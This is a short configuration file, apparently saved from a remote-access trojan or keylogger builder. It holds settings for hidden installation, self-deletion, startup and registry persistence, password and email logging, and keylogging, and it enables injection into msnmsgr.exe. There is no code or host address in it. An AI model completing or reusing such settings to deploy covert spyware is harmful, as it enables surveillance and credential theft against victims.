[Connection]
Group=Group
Identification=Identification
Password=Password
Connections=
Connect To All=0
Install=1
Directory=Desktop\
Filename=filename.exe
Melt=0
Hidden=0
ReadOnly=0
System=0
Archive=0
Startup=0
UseActiveX=0
UseHKLM=0
ActiveX=
HKLM=
Mutex=3jTSgrw
LogEmails=0
LogPasswords=0
System Monitor=0
Processes=0
Windows=0
Applications=0
Service=0
Inject=1
Custom=0
Process=msnmsgr.exe
KeyLogger=0
OneLogPerDay=1
MaxLogs=0
OldLogs=1
MaxLogsNum=10
OldLogsNum=7
